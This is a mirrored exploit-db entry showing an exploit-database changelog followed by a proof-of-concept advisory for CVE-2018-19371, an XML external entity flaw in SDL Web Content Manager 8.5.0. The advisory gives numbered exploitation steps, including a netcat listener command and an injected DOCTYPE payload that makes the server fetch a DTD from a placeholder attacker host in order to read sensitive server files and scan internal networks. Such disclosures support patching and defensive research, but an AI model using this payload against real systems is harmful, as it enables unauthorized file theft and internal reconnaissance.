bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/xml/webapps/46000.txt
Offensive Security c6ebf8bc23 DB: 2018-12-19 
10 changes to exploits/shellcodes

VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)
Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write
AnyBurn 4.3 - Local Buffer Overflow Denial of Service
Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service
MegaPing - Local Buffer Overflow Denial of Service

Exim 4.41 - 'dns_build_reverse' Local
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow

Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)

Microsoft Windows Server 2003 - Token Kidnapping Local
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation

VMware Fusion 2.0.5 - vmx86 kext Local

Nsauditor 3.0.28.0 - Local SEH Buffer Overflow

Google Android 2.0 < 2.1 - Reverse Shell
Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)

MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method

SDL Web Content Manager 8.5.0 - XML External Entity Injection
2018-12-19 05:01:45 +00:00

33 lines
No EOL
1.6 KiB
Text
Raw Blame History

######################
# Author Information #
######################
Author : Ahmed Elhady Mohamed
twitter : @Ahmed__ELhady
Company : Canon Security
Date : 25/11/2018
########################
# Software Information #
########################
Affected Software : SDL Web Content Manager
Version: Build 8.5.0
Vendor: SDL Tridion
Software website : https://www.sdl.com
CVE Number: CVE-2018-19371
###############
# Description #
###############
SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network.
#################
# Exploit Steps #
#################
1- Access the application with any user account
2- it will ask you to choose your language preferences
3-the application sent a request to SaveUserSettings web service with XML content in the request body.
4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80
5- intercept the request using Burpsuite proxy tool
6- inject the following payload in the beginning of the XML value.
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM \"http://attackerServer/xxe1.dtd\">%asd;%c;]>
<cdl>&rrr;</cdl>
7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server.
8- send the request to the server.
9- The application server will connect to the attacker server
Reference in a new issue View git blame Copy permalink